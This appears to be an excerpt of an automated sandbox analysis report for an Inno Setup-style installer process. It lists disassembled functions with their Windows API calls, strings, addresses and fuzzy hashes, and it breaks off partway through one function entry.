Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ChangeNotify
String ID: .lnk$.pif$Desktop.ini$Filename: %s$target.lnk${group}\
API String ID: 3893256919-3966328851
Opcode ID: 23d990d7a20fecb089370616dcf94d7f298d8f09327a709e35c781f1c6f83dfe
Instruction ID: 9837c8abb0defc92026b78f619cda978b5db0580f9f6f21c6430ac3894e01728
Opcode Fuzzy Hash: 23d990d7a20fecb089370616dcf94d7f298d8f09327a709e35c781f1c6f83dfe
Instruction Fuzzy Hash: 19A15374A00109AFDB01EF99C482BEEB7F4AF08304F50816AF814B7391D779AE45CB66

Uniqueness

Uniqueness Score: -1.00%

Function 004764A8 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00455B64: GetLocalTime.KERNEL32(?,00000000,00455CEB,?,?,0048DF10,00000000), ref: 00455B94

FreeLibrary.KERNEL32(10000000), ref: 0047665E
FreeLibrary.KERNEL32(00000000), ref: 00476672
SendMessageA.USER32(?,00000496,00002710,00000000), ref: 0047672B

Strings

Restarting Windows., xrefs: 00476706
Failed to remove temporary directory: , xrefs: 004766B2
GetCustomSetupExitCode, xrefs: 00476505
DeinitializeSetup, xrefs: 00476561
Deinitializing Setup., xrefs: 004764C6
Not restarting Windows because Setup is being run from the debugger., xrefs: 004766E7

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: FreeLibrary$LocalMessageSendTime
String ID: DeinitializeSetup$Deinitializing Setup.$Failed to remove temporary directory: $GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
API String ID: 2162613394-2206919510
Opcode ID: 3c5015a4960e728826c0c0e78e0993cbc173cb30346a3ef9b11c5ccad035f7df
Instruction ID: 88710889204b450ddef80d4bb5843ce3062f5c5781215f01ea294c2a2cd58e68
Opcode Fuzzy Hash: 3c5015a4960e728826c0c0e78e0993cbc173cb30346a3ef9b11c5ccad035f7df
Instruction Fuzzy Hash: 55612630600700AFDB14EF66D895B9A7BE9EB06308F11C4BBF818973A1CB789844CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00454F10 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00455075,?,?,?,?), ref: 00454F38
6CAD5550.KERNEL32(00000000,OLEAUT32.DLL,UnRegisterTypeLib,00000000,00455075,?,?,?,?), ref: 00454F3E
LoadTypeLib.OLEAUT32(00000000,?), ref: 00454F8B

Part of subcall function 00451E44: GetLastError.KERNEL32(00000000,00451EDC,?,?,00000000,00000000,00000005,00000000,00452922,?,?,00000000,0048D628,00000004,00000000,00000000), ref: 00451E68

Strings

UnRegisterTypeLib, xrefs: 00454F2E
LoadTypeLib, xrefs: 00454F96
ITypeLib::GetLibAttr, xrefs: 00454FC1
UnRegisterTypeLib, xrefs: 00454FF7
GetProcAddress, xrefs: 00454F4B
OLEAUT32.DLL, xrefs: 00454F33

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: D5550ErrorHandleLastLoadModuleType
String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
API String ID: 1267307030-2711329623
Opcode ID: aed263ed5648d535ed8f6f434b80fa5aa92fc9739765fb6e89cd270ac0a17f99
Instruction ID: 0a1100805ea1f579c8d6b43e9e4a1f9952dea1fbb95a38e61b6d9b86ecb1b516
Opcode Fuzzy Hash: aed263ed5648d535ed8f6f434b80fa5aa92fc9739765fb6e89cd270ac0a17f99
Instruction Fuzzy Hash: 9431A371700A04AFC711EFAACC61D6BB7BDEB89B157108466FD04D7692DA38DC0486A8

Uniqueness

Uniqueness Score: -1.00%

Function 0042E2D4 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E3D9,?,?,00000000,00000000,0047581C,?,00000001,00000000,00000002,00000000,00475FEC), ref: 0042E2FD
6CAD5550.KERNEL32(00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E3D9,?,?,00000000,00000000,0047581C,?,00000001,00000000,00000002,00000000,00475FEC), ref: 0042E303
RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E3D9,?,?,00000000,00000000,0047581C,?,00000001), ref: 0042E351

Strings

.DEFAULT\Control Panel\International, xrefs: 0042E328
GetUserDefaultUILanguage, xrefs: 0042E2F3
Locale, xrefs: 0042E340
Control Panel\Desktop\ResourceLocale, xrefs: 0042E360
kernel32.dll, xrefs: 0042E2F8

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CloseD5550HandleModule
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
API String ID: 2067295843-2401316094
Opcode ID: eac289779dc9a35405dacf305eb194efd7d16bf3728e6d0d51f92599c330f9e5
Instruction ID: 2ffba39c9ec1f6b7cffe41910bb2280be0d998a6ad9fce04057ee52685a60889
Opcode Fuzzy Hash: eac289779dc9a35405dacf305eb194efd7d16bf3728e6d0d51f92599c330f9e5
Instruction Fuzzy Hash: 12215830B04215ABDB10EAA3DC91B9F77B8EB04305F90447BA900E7291DB78DE01CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00416E48 Relevance: 15.2, APIs: 10, Instructions: 167windowCOMMON

Download Yara Rule

APIs

RectVisible.GDI32(?,?), ref: 00416EDB
SaveDC.GDI32(?), ref: 00416EEF
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416F12
RestoreDC.GDI32(?,?), ref: 00416F2D
CreateSolidBrush.GDI32(00000000), ref: 00416FAD
FrameRect.USER32 ref: 00416FE0
DeleteObject.GDI32(?), ref: 00416FEA
CreateSolidBrush.GDI32(00000000), ref: 00416FFA
FrameRect.USER32 ref: 0041702D
DeleteObject.GDI32(?), ref: 00417037

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 375863564-0
Opcode ID: 964d93497028cbc6991c5c4536bdc5add608c04f7d813be7827ebd80889c79e1
Instruction ID: da30a3232c1dc10d551ab5d1fc10539b4d507e23bbc5398dd1f758c738a3ed68
Opcode Fuzzy Hash: 964d93497028cbc6991c5c4536bdc5add608c04f7d813be7827ebd80889c79e1
Instruction Fuzzy Hash: A6513C71204645AFCB50EF29C984B9B77E8AF48314F15566AFD48CB287C738EC81CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00404C0F Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON

Download Yara Rule

APIs

6CAD5CA0.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404C96
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404CBA
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404CD6
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404CF7
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404D20
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404D2A
GetStdHandle.KERNEL32(000000F5), ref: 00404D4A
GetFileType.KERNEL32(?,000000F5), ref: 00404D61
CloseHandle.KERNEL32(?,?,000000F5), ref: 00404D7C
GetLastError.KERNEL32(000000F5), ref: 00404D96

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: File$HandlePointer$CloseErrorLastReadSizeType
String ID:
API String ID: 2587015848-0
Opcode ID: 32fbc3d591d887db1daa96df7588f8d0b8ed6a028886d61b7680b13e569ddf3c
Instruction ID: 206bcdb747724065788a6a6a215919135cebaaf405beceec5406885cc449240e
Opcode Fuzzy Hash: 32fbc3d591d887db1daa96df7588f8d0b8ed6a028886d61b7680b13e569ddf3c
Instruction Fuzzy Hash: 814180B01057009AE7306F248809B3775E5AFC1764F248A3FE2A6BA6E0E77DE845875D

Uniqueness

Uniqueness Score: -1.00%

Function 004222B0 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 004222FB
DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422319
DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422326
DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422333
DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422340
DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 0042234D
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 0042235A
DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00422367
EnableMenuItem.USER32 ref: 00422385
EnableMenuItem.USER32 ref: 004223A1

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: a71815bfce3839e5d59f0b64983f550f02594c27ccd0ca70a59ab461335a7683
Instruction ID: 69e16c91d3084d14181d37bcb75724531617602d3fcf40d776552ae4b11e6cc4
Opcode Fuzzy Hash: a71815bfce3839e5d59f0b64983f550f02594c27ccd0ca70a59ab461335a7683
Instruction Fuzzy Hash: 622121703847057AEB21DB25CD8FF9A7AD8AB04718F0444A5BA447F2D3C7FDAA408A58

Uniqueness

Uniqueness Score: -1.00%

Function 0045BDCC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0042CBC4: CharPrevA.USER32(00000000,00000000,?,?,?,00000000,0042CD0A,00000000,0042CD30,?,?,?,00000000,00000000,?,0042CD45), ref: 0042CBEC

SHGetMalloc.SHELL32(?), ref: 0045BE07
GetActiveWindow.USER32 ref: 0045BE6B
CoInitialize.OLE32(00000000), ref: 0045BE7F
SHBrowseForFolder.SHELL32(?), ref: 0045BE96
76E2F460.OLE32(0045BED7,00000000,?,?,?,?,?,00000000,0045BF5B), ref: 0045BEAB
SetActiveWindow.USER32(?,0045BED7,00000000,?,?,?,?,?,00000000,0045BF5B), ref: 0045BEC1
SetActiveWindow.USER32(?,?,0045BED7,00000000,?,?,?,?,?,00000000,0045BF5B), ref: 0045BECA

Strings

A, xrefs: 0045BE3F

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ActiveWindow$BrowseCharF460FolderInitializeMallocPrev
String ID: A
API String ID: 917524086-3554254475
Opcode ID: 0cb04e95cc2b8f3418b7ed81ca2b8f6428beee4110c3bfc39c51b83993a3b858
Instruction ID: 40f59b17f8b227a8e47d7ce9633a3b39aa69965a961231048fa4038206e478c7
Opcode Fuzzy Hash: 0cb04e95cc2b8f3418b7ed81ca2b8f6428beee4110c3bfc39c51b83993a3b858
Instruction Fuzzy Hash: 01310271D00308AFDB10EFA6D84669EBBF4EF09704F51446EF914E7252D7785A048B99

Uniqueness

Uniqueness Score: -1.00%

Function 00459DC4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41COMMON

Download Yara Rule

APIs

6CAD5550.KERNEL32(00000000,inflateInit_,?,00474532,00000000,00474575), ref: 00459DCD
6CAD5550.KERNEL32(00000000,inflate,00000000,inflateInit_,?,00474532,00000000,00474575), ref: 00459DDD
6CAD5550.KERNEL32(00000000,inflateEnd,00000000,inflate,00000000,inflateInit_,?,00474532,00000000,00474575), ref: 00459DED
6CAD5550.KERNEL32(00000000,inflateReset,00000000,inflateEnd,00000000,inflate,00000000,inflateInit_,?,00474532,00000000,00474575), ref: 00459DFD

Strings

inflateInit_, xrefs: 00459DC7
inflateReset, xrefs: 00459DF7
inflateEnd, xrefs: 00459DE7
inflate, xrefs: 00459DD7

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: D5550
String ID: inflate$inflateEnd$inflateInit_$inflateReset
API String ID: 183293030-3516654456
Opcode ID: 08be8e6723b555c98a90567aa473cb96b3cd92cfe30f32e8e3ddb5f49466edf1
Instruction ID: 593e9f5ebda3a002a962f724245eb82e3e35f3a9e9cc54a335af02b5c8b8f83e
Opcode Fuzzy Hash: 08be8e6723b555c98a90567aa473cb96b3cd92cfe30f32e8e3ddb5f49466edf1
Instruction Fuzzy Hash: 210121B0D40740DED724DF229C4676B3B95A78A306F14943BB807516E6D77C0C49CE1D

Uniqueness

Uniqueness Score: -1.00%

Function 0041A9A4 Relevance: 13.7, APIs: 9, Instructions: 176windowCOMMON

Download Yara Rule

APIs

SetBkColor.GDI32(?,00000000), ref: 0041AA81
72E697E0.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AABB
SetBkColor.GDI32(?,?), ref: 0041AAD0
StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AB1A
SetTextColor.GDI32(00000000,00000000), ref: 0041AB25
SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AB35
StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AB74
SetTextColor.GDI32(00000000,00000000), ref: 0041AB7E
SetBkColor.GDI32(00000000,?), ref: 0041AB8B

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Color$StretchText$E697
String ID:
API String ID: 2665930546-0
Opcode ID: c56cf52689fd51e5bd55cf85186bda95c83bec91cc31fa4deaf11f1e19070ac1
Instruction ID: ee86f0750f3c85e4cb2c78ceea8e401274d7fa79e019d7e0a2921028e538c732
Opcode Fuzzy Hash: c56cf52689fd51e5bd55cf85186bda95c83bec91cc31fa4deaf11f1e19070ac1
Instruction Fuzzy Hash: 5761C4B5A00115AFCB40EFADD985E9EB7F8BF08304B1085A9F518DB256C738ED40CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0044D0AC Relevance: 13.6, APIs: 9, Instructions: 90COMMON

Download Yara Rule

APIs

OffsetRect.USER32(?,00000001,00000001), ref: 0044D0DD
GetSysColor.USER32(00000014), ref: 0044D0E4
SetTextColor.GDI32(00000000,00000000), ref: 0044D0FC
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D125
OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D12F
GetSysColor.USER32(00000010), ref: 0044D136
SetTextColor.GDI32(00000000,00000000), ref: 0044D14E
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D177
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1A2

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Text$Color$Draw$OffsetRect
String ID:
API String ID: 1005981011-0
Opcode ID: 33048d6fe813da3bf702f19ff274443e3f4d5eee3abaf323698d31b78f6c996e
Instruction ID: c739dd69d65c9e7912bbc932d9ac453e2b825e6c1c1415afdccf92aa0735ef3c
Opcode Fuzzy Hash: 33048d6fe813da3bf702f19ff274443e3f4d5eee3abaf323698d31b78f6c996e
Instruction Fuzzy Hash: 4921CCB42015007FC710FB6ECC9AE9B7BDC9F09359B01857AB958EB393C678DD448668

Uniqueness

Uniqueness Score: -1.00%

Function 0041B734 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0041B80D
72E5AC50.USER32(?), ref: 0041B819
72E5B410.GDI32(00000000,?,00000000,00000000,0041B8E4,?,?), ref: 0041B84E
72E5B150.GDI32(00000000,00000000,?,00000000,00000000,0041B8E4,?,?), ref: 0041B85A
72E5A7F0.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B8C2,?,00000000,0041B8E4,?,?), ref: 0041B888
72E5B410.GDI32(00000000,00000000,00000000,0041B8C9,?,?,00000000,00000000,0041B8C2,?,00000000,0041B8E4,?,?), ref: 0041B8BC

Strings

[rG, xrefs: 0041B73C

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: B410$B150Focus
String ID: [rG
API String ID: 1979529269-1780078340
Opcode ID: a8189996918be81ac9f98b6a3fba9c441f062151ba4384118a9bc054385206b8
Instruction ID: f3c935502b2b24554daab9b13747c211e985ab90b43413e07b92cff4b62194e0
Opcode Fuzzy Hash: a8189996918be81ac9f98b6a3fba9c441f062151ba4384118a9bc054385206b8
Instruction Fuzzy Hash: 61512D70A00208AFCB11DFA9C891AEEBBF9EF49704F114066F504A7351D7789D81CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA04 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0041BADF
72E5AC50.USER32(?), ref: 0041BAEB
72E5B410.GDI32(00000000,?,00000000,00000000,0041BBB1,?,?), ref: 0041BB25
72E5B150.GDI32(00000000,00000000,?,00000000,00000000,0041BBB1,?,?), ref: 0041BB31
72E5A7F0.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BB8F,?,00000000,0041BBB1,?,?), ref: 0041BB55
72E5B410.GDI32(00000000,00000000,00000000,0041BB96,?,?,00000000,00000000,0041BB8F,?,00000000,0041BBB1,?,?), ref: 0041BB89

Strings

[rG, xrefs: 0041BA0C

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: B410$B150Focus
String ID: [rG
API String ID: 1979529269-1780078340
Opcode ID: c7144ceedfe7497c6f1595be13c786ac999bba09c7dafa15f546a2b8206c1d70
Instruction ID: ac1f8aadad1114e4f4ac6eb4a49caba013dce75178cc3f394fbbc19ef7fe8806
Opcode Fuzzy Hash: c7144ceedfe7497c6f1595be13c786ac999bba09c7dafa15f546a2b8206c1d70
Instruction Fuzzy Hash: E6512A70A002189FCB11DFA9C891AEEB7F9EF49700F51806AF504EB755D738AD40CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004544DC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 00407314: GetCurrentDirectoryA.KERNEL32(00000104,?,DllRegisterServer,0045450C,00000000,00454649,?,?,00000000,0048D628), ref: 00407323

LoadCursorA.USER32 ref: 00454513
SetCursor.USER32(00000000,00000000,00007F02,00000000,00454649,?,?,00000000,0048D628), ref: 00454519
SetErrorMode.KERNEL32(00008000,00000000,00000000,00007F02,00000000,00454649,?,?,00000000,0048D628), ref: 00454532
6CAD5550.KERNEL32(00000000,?,00000000,004545F0,?,00000000,0045461F,?,00008000,00000000,00000000,00007F02,00000000,00454649), ref: 0045459F
FreeLibrary.KERNEL32(00000000,004545F7,?,00008000,00000000,00000000,00007F02,00000000,00454649,?,?,00000000,0048D628), ref: 004545EA

Strings

LoadLibrary, xrefs: 00454582
GetProcAddress, xrefs: 004545AC

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Cursor$CurrentD5550DirectoryErrorFreeLibraryLoadMode
String ID: GetProcAddress$LoadLibrary
API String ID: 1519367851-2209490600
Opcode ID: fa0c707e2429b9f3e818442b4ed539e8b7c6d0f8d1f11672067a7b51481401a3
Instruction ID: 7dc7c09ef35d44694d37c8cae758e1d41a5e37138ca179a59afc0dcdca3846aa
Opcode Fuzzy Hash: fa0c707e2429b9f3e818442b4ed539e8b7c6d0f8d1f11672067a7b51481401a3
Instruction Fuzzy Hash: 58319C70F006096BC711EFB68842A5EB6A8EB45709F51447BBD04E7343D67C9D44CAAD

Uniqueness

Uniqueness Score: -1.00%

Function 00453A2C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

ShellExecuteEx.SHELL32(?), ref: 00453ABC
GetLastError.KERNEL32(00000000,00453B3D,?,?,?,00000001), ref: 00453ACD
WaitForInputIdle.USER32 ref: 00453AEC
